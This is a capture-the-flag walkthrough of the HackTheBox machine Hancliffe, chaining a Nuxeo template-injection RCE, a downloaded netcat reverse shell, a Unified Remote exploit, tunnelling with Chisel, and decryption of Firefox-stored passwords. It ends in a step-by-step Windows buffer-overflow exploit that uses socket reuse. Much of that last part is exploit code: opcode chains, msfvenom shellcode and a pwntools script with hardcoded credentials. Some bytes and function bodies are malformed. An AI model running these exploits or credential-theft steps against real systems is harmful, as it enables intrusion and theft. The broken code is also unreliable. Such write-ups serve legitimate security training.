Hancliffe - HackTheBox


I started with an Nmap scan for open ports.

└─$ nmap -sS --min-rate 5000 -v -n -Pn -p- -o nmap.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Warning: The -o option is deprecated. Please use -oN
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-12 04:53 EST
Initiating SYN Stealth Scan at 04:53
Scanning [65535 ports]
Discovered open port 80/tcp on
Discovered open port 8000/tcp on
Discovered open port 9999/tcp on
Completed SYN Stealth Scan at 04:53, 26.41s elapsed (65535 total ports)
Nmap scan report for
Host is up (0.044s latency).
Not shown: 65532 filtered tcp ports (no-response)
80/tcp   open  http
8000/tcp open  http-alt
9999/tcp open  abyss

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.50 seconds
           Raw packets sent: 131086 (5.768MB) | Rcvd: 22 (968B)

I made another one to identify the version of each service.

└─$ nmap -sCV -p80,8000,9999 -o services.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-12 04:54 EST
Nmap scan report for
Host is up (0.056s latency).

80/tcp   open  http    nginx 1.21.0
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.21.0
8000/tcp open  http    nginx 1.21.0
|_http-title: HashPass | Open Source Stateless Password Manager
|_http-server-header: nginx/1.21.0
9999/tcp open  abyss?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe: 
|     Welcome Brankas Application.
|     Username: Password:
|   NULL: 
|     Welcome Brankas Application.
|_    Username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.32 seconds

The main page had the following:


nginx, nothing interesting, and through port 8000:


It seemed to be some kind of password generator based on what you put into it, I gave it a try.


It generated a password for me, but it was of no use to me, I left it in the background and connected to port ‘9999’ using nc.


It was an application that asked for credentials that it didn’t have, so I resorted to fuzzing the main page and found the maintentance directory that caught my attention.


Accessing the resource via a redirect to a 404 Not Found.


Send a GET request to that resource to see the response headers.


The redirect is applied by the Location header, I tried to access a resource that does not exist with ..; because java was running on the server and it might work.


And yes, I don’t apply the redirect, this caught my attention, so I tried to do fuzzing using ..; and found many resources.


/login.jsp, upon accessing it I found a login panel.


At the bottom was the nuxeo version, I did a little search for exploits.


This sent a GET request to a given path leveraging what appeared to be an SSTI.


I immediately tried to check if it was vulnerable.


And if it was vulnerable, it reported 14 in the error output.


Now I just needed to find a way to gain RCE, in PayloadAllTheThings I found malicious statements that allowed me to gain arbitrary code execution.


To verify this, I set tcpdump to listen for ICMP traces.


After receiving the ICMP traces I just needed to gain access to the machine, I opened a Python server hosting nc64.exe and downloaded it from the victim machine with curl, exporting it to C:\programdata\, since it had write capability.


Send another request establishing a TCP connection to me from the victim’s nc64.exe.


And I gained access as user svc_account, changed to the root directory and there was the following.


Nothing out of the ordinary, I didn’t have the ability to read the flag either, looking at the ports that were running internally on the machine, I found the following:


To list the ports by name and additional information, I used the following command in PowerShell:


I was running this binary that caught my attention on port 9511, I left it in the background.


After a quick look at all the ports there were, there was one that after a quick Google search gave it away, port 9512, I found an Unified Remote exploit.


I had to pass him the IP of the vulnerable server, the port and a malicious binary, since this would make the certutil to download it and execute it.


Port 9512 was open internally so it could not be reached from outside, so I did a port forwarding with Chisel, opened a server on my machine.


And from the other machine I connected as a client to the server on port 8888.


And I already had port 9512 accessible on my localhost, I verified it with netstat -nat.


Run the exploit.


And gain access to the machine as the clara user.


And I already had access to the user’s flag.


Enumerating carefully, I found two Firefox user directories.


The first one had nothing.


The other one had a lot of files and folders so I decided to download them to my machine, I opened an SMB server.


I copied the ljftf853.default-release directory to my drive with copy -recurse ljftf853.default-release \\\files, it had a notable file called logins.json.


I had an encryptedPassword which I could decrypt if I had the file key4.db or key3.db, ​​which the former had, I used the tool firepwd.py for that, it allowed me to decrypt Mozilla protected passwords.


└─$ python3 firepwd.py -d ../ljftf853.default-release                                                   
globalSalt: b'9a30912b4d63331f8493789d7b0fce68520f9265'
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'cda4b75c5041c6cc7114e053f012122ce92ada163d91df9306158a06d145998a'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840. aes256-CBC
         OCTETSTRING b'f8cea67900ed4b333ca56416f69a'
   OCTETSTRING b'3f321c52f6534075d3d8915531d27df9'
clearText b'70617373776f72642d636865636b0202'
password check? True
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'8d0ed50896869dc856de82150164a1390a953b67792edac2a62315625836ff08'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840. aes256-CBC
         OCTETSTRING b'76eba390fe01807925d822a071da'
   OCTETSTRING b'cde74fae29c28c791794371b447180cabce01b6927bac73199f192e557136c36'
clearText b'9efbbfd986fd5bef94b032679b7679d09b1f51891601b6e50808080808080808'
decrypting login/password pairs

And within seconds I figured it out, there was another user on the system called development.


This was actually a hint, if we recall there was a password generation page, so I put these credentials and the user development.


The generated password could be used to authenticate through winrm using the user development, since it was within the group Remote Management Users, but it is not exposed, so I had to do another port forwarding of port ‘5985’, I opened a server on my machine with Chisel through port 8888 and connected as a client from the victim machine.


Now, I authenticated with the development user using winrm.



For escalation I remembered the binary running on port 9511 on the machine called MyFirstApp.exe.


I transferred it to my machine and did reversing with ghidra, there was a _login function with some credentials.


The password seemed to be in base64, I decoded it.


But it was of no use to me until I saw the _encrypt1 and _encrypt2 functions.


This is _encrypt1, it was replacing the first letter with the last and so on, the atbash encryption algorithm was being applied.

The second, this ROT47, replaces an ASCII character with the 47th character after it.


First I did the reverse process of Base64, then atbash and finally ROT47, this password remains.

https://imgur.com/5JrBaoL.png https://imgur.com/9T4jqCl.png

Analyzing the binary further I found another function called _SavedCreds, this is used to store the credentials, the problem is that it uses strcpy to copy the buffer that is defined in 50 bytes, this causes a buffer overflow.


Going into a little more detail in the _login function, I see that a connection is being established, a socket with 400 bytes in length after entering something in a field called Input Your Code, this caught my attention, because if I connect to port 9999 from nc and use the credentials I have…


Exactly, this binary is the one running on port 9999 externally on the machine and is vulnerable to BoF, so I fed it a lot of A’s and it corrupted it.


To take advantage of this I first exploited it locally, started x32dbg and the binary.


I first created a special chain with pattern_create to find the bytes before overwriting EIP.

In the exploit I started by defining the pwn library to be able to interact with the binary, and sys to define the arguments that have to be passed to it, I also define a class called Exploit with an initializer to which I have passed three variables, which would be the user, the password and the name, and finally I define a method which is where the flow of the exploit will start.


from pwn import *
from sys import argv

class Exploit():

	def __init__(self, user, password, name):

		self.__user = user
		self.__password = password
		self.__name = name

	def socket_reuse(self):
		r = remote("", argv[1])

		r.sendlineafter(b"Username: ",self.__user)
		r.sendlineafter(b"Password: ",self.__password)
		r.sendlineafter(b"Input Your Code:",payload)

autopwn = Exploit(b'alfiansyah', b'K3r4j@@nM4j@pAh!T', 'Vickry Alfiansyah')

def main():

if __name__ == '__main__':

I started by checking that the exploit worked fine.


The second thing I did was disable DEP, otherwise I wouldn’t be able to execute instructions from the stack, this can be done from performance options.


Now I could continue, first with pattern_create I created a special chain telling it with how many bytes my program corrupts, I put 200, this is to know how many bytes to pass before overwriting EIP.


In the script I added the following line with the string generated by pattern_create in the payload variable.

payload= "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"

After running the exploit this was the address that EIP had:


I copied and pasted it into pattern_offset.


There it is, the offset is 66 bytes before overwriting EIP. I tried sending 100 B with the following string updating the payload variable:

payload = 100*"\xBB"

This was the result:


As you can see, not all the Bs I have sent are there, this happens because the defined buffer is very limited, here we have a problem, since if we do not have enough space we will not be able to inject our shellcode, here I made use of a technique called socket reuse, it is based on the reuse of sockets to inject shellcode, since there is usually enough space to take advantage of. The next step was to do a search for addresses containing jmp esp in the push ebp address.



This was the result in the References tab.


I made a breakpoint at an address similar to the one in push ebp, in this case 719023A8, this was going to serve as a “return address”, I added it to the payload variable in little endian.

payload = 66*"xBB" + p32(0x719023A8)


After an exploit run ESP became 023FFF18, after hitting Step Into the address ESP was changed to EIP.


EIP was pointing to the end of my bytes and I had to make it point from the beginning so that the program flow would go down and pass through an address with the socket buffer. To do this what I did was open nasm_shell.rb and subtract 70 bytes because the buffer is 66 bytes + 4 bytes of the address.


I added this opcode to the payload variable.

payload = 66*"xBB" + p32(0x719023A8) + b"\xeb\xb8"

I already had EIP pointing to the beginning of my chain.


The next step was to identify the socket’s recv function and make a breakpoint when it makes the call.


I did this to see the address structure of the recv function.


The first address is the descriptor that identifies the socket, the second is the buffer to receive the data, in this case the shellcode, the third is the length, in this case 400 bytes as we have seen with ghidra and the last are the flags, these addresses are interpreted from bottom to top so I had to adapt it to how they are, this can be seen better this way:

int recv(
  [in]  SOCKET s,
  [out] char   *buf,
  [in]  int    len,
  [in]  int    flags

I did a push on ESP to push it to the very bottom of the stack and then I did a pop on eax to unpop ESP and have EAX have the address of ESP.

  • This is what push and pop do


I ran the program and it did the push esp.


The value I had in EAX was the following:


So now the value of ESP had to be at the end, that is, the last address of the stack.


And now, after doing a pop eax, the address of ESP which is 023FFF28 was in the EAX register.


I did all this so that I could perform arithmetic operations and input and output operations with this register. My idea was that the descriptor of the socket that was in position 60 was at the end of the stack, the last address, so I subtracted 60 from 18, since this must be appropriate for the socket.


After doing 0x60 - 0x18 the result was 0x48, but the result had a null byte, this should not be there because otherwise the exploit would not work as it should, to avoid this I did an addition of 0x230 because it did not have null byte and I subtracted 0x48, the result was 0x1E8, in this way the result did not have a null byte and behaved the same way.


In the script I had the opcode that subtracted 70 to position ESP (acts as a “return address”) at the beginning of the A’s and the opcode of push esp and pop eax, these in the variable recv. The payload variable does the calculations, adding recv to the remaining string in A after subtracting the 66 bytes from the length of recv and then adding the address of jmp esp to the opcodes.

recv = b""
recv += b"\x54" 				          # -> push esp
recv += b"\x58" 				          # -> pop eax
recv += b"\x66\x05\x30\x02" 			# -> add ax, 0x230
recv += b"\x66\x2d\xe8\x01" 			# -> sub ax, 0x1E8

payload = recv + b"\xAA"*(66 - len(recv)) + p32(0x719023A8) + b"\xeb\xb8" # -> jmp $-70

Now, the value of the socket descriptor had to be stored in a register in order to be able to call it later, in this case ESI, what I did was move the value of EAX that now contained the address of the socket descriptor to ESI.


I entered the opcode in the exploit in the recv variable.

recv += b"\x8b\x30" # -> mov esi, [eax]

Run the exploit and EAX had the address where the socket descriptor was, 024BFF60.


After doing a Step Into I had already stored the descriptor in ESI, I already had the socket descriptor done, now I only had the buffer, the length and the flags left, but I had a small problem, EIP will go down where it can meet ESP, this could cause problems.


To fix this I simply subtracted 70 bytes from ESP.


I did this so that I position ESP above EIP and there would be no problems when EIP interprets downwards.


I continued with the flags, this value had 0x00000000, I could use EBX to store it, I did an xor to ebx because it results in 0 and I also did a push to EBX to stack it at the end.

image image

Now I could simply add 410 bytes to EBX to make the length, since it’s 0, and push EBX again to push the length to the end of the stack.



This is how the exploit was looking.

recv = b""
recv += b"\x54" 				# -> push esp
recv += b"\x58" 				# -> pop eax
recv += b"\x66\x05\x30\x02" 			# -> add ax, 0x230
recv += b"\x66\x2d\xe8\x01" 			# -> sub ax, 0x1E8
recv += b"\x8b\x30" 				# -> mov esi, dword [eax]
recv += b"\x83\xec\x70" 			# -> sub esp, 0x70
recv += b"\x31\xdb" 				# -> xor ebx, ebx
recv += b"\x53" 				# -> push ebx 
recv += b"\x66\x81\xc3\x10\x04" 		# -> add bx, 0x410
recv += b"\x53" 				# -> push ebx

payload = recv + b"\xAA"*(66 - len(recv)) + p32(0x719023A8) + b"\xeb\xb8" # -> jmp $-70

Since I had subtracted 70 bytes in the ESP, I made EBX have the value of ESP to add 70 bytes back to EBX and fall at an intermediate point where my A’s are, there I will put NOPS so that the flow of the program goes smoothly to EBX which will be pointing to the socket function recv, which will contain enough space to store the shellcode.

image image

EBX already had the same address as ESP.


I did a Step Info and the sum of the 70 bytes was applied, so EBX was already somewhere in the middle of the A’s.


The exploit was looking like this:

recv = b""
recv += b"\x54" 				# -> push esp
recv += b"\x58" 				# -> pop eax
recv += b"\x66\x05\x30\x02" 			# -> add ax, 0x230
recv += b"\x66\x2d\xe8\x01" 			# -> sub ax, 0x1E8
recv += b"\x8b\x30" 				# -> mov esi, dword [eax]
recv += b"\x83\xec\x70" 			# -> sub esp, 0x70
recv += b"\x31\xdb" 				# -> xor ebx, ebx
recv += b"\x53" 				# -> push ebx 
recv += b"\x66\x81\xc3\x10\x04" 		# -> add bx, 0x410
recv += b"\x53" 				# -> push ebx
recv += b"\x54"					# -> push esp	
recv += b"\x5b"					# -> pop ebx
recv += b"\x66\x83\xc3\x70"			# -> add bx, 0x70
recv += b"\x53"					# -> push ebx

payload = recv + b"\xAA"*(66 - len(recv)) + p32(0x719023A8) + b"\xeb\xb8" # -> jmp $-70

Now I simply did a push ebx containing the buffer and a push esi containing the socket descriptor.


I ran the exploit with the new values ​​and this was the result:


Perfect! I already had all the corresponding values ​​appropriate to the socket, the only thing left was to make the call, for which I needed the address of the socket, which I extracted from ghidra.


I put this address in EAX with mov eax, [0x719082ac] and made a call to EAX.


I converted the A’s to NOPS and this is what the exploit looked like.

recv = b""
recv += b"\x54" 				# -> push esp
recv += b"\x58" 				# -> pop eax
recv += b"\x66\x05\x30\x02" 			# -> add ax, 0x230
recv += b"\x66\x2d\xe8\x01" 			# -> sub ax, 0x1E8
recv += b"\x8b\x30" 				# -> mov esi, dword [eax]
recv += b"\x83\xec\x70" 			# -> sub esp, 0x70
recv += b"\x31\xdb" 				# -> xor ebx, ebx
recv += b"\x53" 				# -> push ebx
recv += b"\x66\x81\xc3\x10\x04" 		# -> add bx, 0x410
recv += b"\x53" 				# -> push ebx
recv += b"\x54"					# -> push esp
recv += b"\x5b"					# -> pop ebx
recv += b"\x66\x83\xc3\x70"			# -> add bx, 0x70
recv += b"\x53"					# -> push ebx
recv += b"\x56" 				# -> push esi
recv += b"\xa1\xac\x82\x90\x71"			# -> mov eax, [0x719082ac]
recv += b"\xff\xd0"				# -> call eax

payload = recv + b"\x90"*(66 - len(recv)) + p32(0x719023A8) + b"\xeb\xb8" # -> jmp $-70

Now I simply create my shellcode with msfvenom.


I put it in the exploit and it was intact.


from pwn import *
from sys import argv
from time import sleep

class Exploit():

	def __init__(self, user, password, name):
		self.__user = user
		self.__password = password
		self.__name = name

	def socket_reuse(self):
		int recv(
  			[in]  SOCKET s, 0x
  			[out] char   *buf, -> 0x00be40f0
  			[in]  int    len, ->  0x00000410 
  			[in]  int    flags -> 0x00000000
		# Switch to your shellcode
		buf =  b""
    		buf += b"\xdb\xdc\xd9\x74\x24\xf4\xb8\x0c\x84\x35\xbe\x5a\x33"
    		buf += b"\xc9\xb1\x52\x31\x42\x17\x83\xc2\x04\x03\x4e\x97\xd7"
    		buf += b"\x4b\xb2\x7f\x95\xb4\x4a\x80\xfa\x3d\xaf\xb1\x3a\x59"
    		buf += b"\xa4\xe2\x8a\x29\xe8\x0e\x60\x7f\x18\x84\x04\xa8\x2f"
    		buf += b"\x2d\xa2\x8e\x1e\xae\x9f\xf3\x01\x2c\xe2\x27\xe1\x0d"
    		buf += b"\x2d\x3a\xe0\x4a\x50\xb7\xb0\x03\x1e\x6a\x24\x27\x6a"
    		buf += b"\xb7\xcf\x7b\x7a\xbf\x2c\xcb\x7d\x3\x47\x24\x30"
    		buf += b"\x02\x8b\x5c\x79\x1c\xc8\x59\x33\x97\x3a\x15\xc2\x71"
    		buf += b"\x73\xd6\x69\xbc\xbb\x25\x73\xf9\x7c\xd6\x06\xf3\x7e"
    		buf += b"\x6b\x11\xc0\xfd\xb7\x94\xd2\xa6\x3c\x0e\x3e\x56\x90"
    		buf += b"\xc9\xb5\x54\x5d\x9d\x91\x78\x60\x72\xaa\x85\xe9\x75"
    		buf += b"\x7c\x0c\xa9\x51\x58\x54\x69\xfb\xf9\x30\xdc\x04\x19"
    		buf += b"\x9b\x81\xa0\x52\x36\xd5\xd8\x39\x5f\x1a\xd1\xc1\x9f"
    		buf += b"\x34\x62\xb2\xad\x9b\xd8\x5c\x9e\x54\xc7\x9b\xe1\x4e"
    		buf += b"\xbf\x33\x1c\x71\xc0\x1a\xdb\x25\x90\x34\xca\x45\x7b"
    		buf += b"\xc4\xf3\x93\x2c\x94\x5b\x4c\x8d\x44\x1c\x3c\x65\x8e"
    		buf += b"\x93\x63\x95\xb1\x79\x0c\x3c\x48\xea\x39\xcb\x42\xdf"
    		buf += b"\x55\xc9\x62\x1e\x1d\x44\x84\x4a\x71\x01\x1f\xe3\xe8"
   		buf += b"\x08\xeb\x92\xf5\x86\x96\x95\x7e\x25\x67\x5b\x77\x40"
    		buf += b"\x7b\x0c\x77\x1f\x21\x9b\x88\xb5\x4d\x47\x1a\x52\x8d"
    		buf += b"\x0e\x07\xcd\xda\x47\xf9\x04\x8e\x75\xa0\xbe\xac\x87"
    		buf += b"\x34\xf8\x74\x5c\x85\x07\x75\x11\xb1\x23\x65\xef\x3a"
    		buf += b"\x68\xd1\xbf\x6c\x26\x8f\x79\xc7\x88\x79\xd0\xb4\x42"
  		buf += b"\xed\xa5\xf6\x54\x6b\xaa\xd2\x22\x93\x1b\x8b\x72\xac"
   		buf += b"\x94\x5b\x73\xd5\xc8\xfb\x7c\x0c\x49\x1b\x9f\x84\xa4"
    		buf += b"\xb4\x06\x4d\x05\xd9\xb8\xb8\x4a\xe4\x3a\x48\x33\x13"
    		buf += b"\x22\x39\x36\x5f\xe4\xd2\x4a\xf0\x81\xd4\xf9\xf1\x83"

		recv = b""
		recv += b"\x54" 				# -> push esp
		recv += b"\x58" 				# -> pop eax
		recv += b"\x66\x05\x30\x02" 			# -> add ax, 0x230
		recv += b"\x66\x2d\xe8\x01" 			# -> sub ax, 0x1E8
		recv += b"\x8b\x30" 				# -> mov esi, dword [eax]
		recv += b"\x83\xec\x70" 			# -> sub esp, 0x70
		recv += b"\x31\xdb" 				# -> xor ebx, ebx
		recv += b"\x53" 				# -> push ebx 
		recv += b"\x66\x81\xc3\x10\x04" 		# -> add bx, 0x410
		recv += b"\x53" 				# -> push ebx
		recv += b"\x54"					# -> push esp
		recv += b"\x5b"					# -> pop ebx
		recv += b"\x66\x83\xc3\x70"			# -> add bx, 0x70
		recv += b"\x53"					# -> push ebx
		recv += b"\x56" 				# -> push esi
		recv += b"\xa1\xac\x82\x90\x71"			# -> mov eax, [0x719082ac]
		recv += b"\xff\xd0"				# -> call eax
		payload = recv + b"\x90"*(66 - len(recv)) + p32(0x719023A8) + b"\xeb\xb8" # -> jmp $-70

		r = remote("", argv[1])

		r.sendlineafter(b"Username: ",self.__user)
		r.sendlineafter(b"Password: ",self.__password)
		r.sendlineafter(b"Input Your Code:",payload)

autopwn = Exploit(b'alfiansyah', b'K3r4j@@nM4j@pAh!T', 'Vickry Alfiansyah')

def main():

if __name__ == '__main__':

Simply run it and gain access as Administrator


And I could already visualize the flag.


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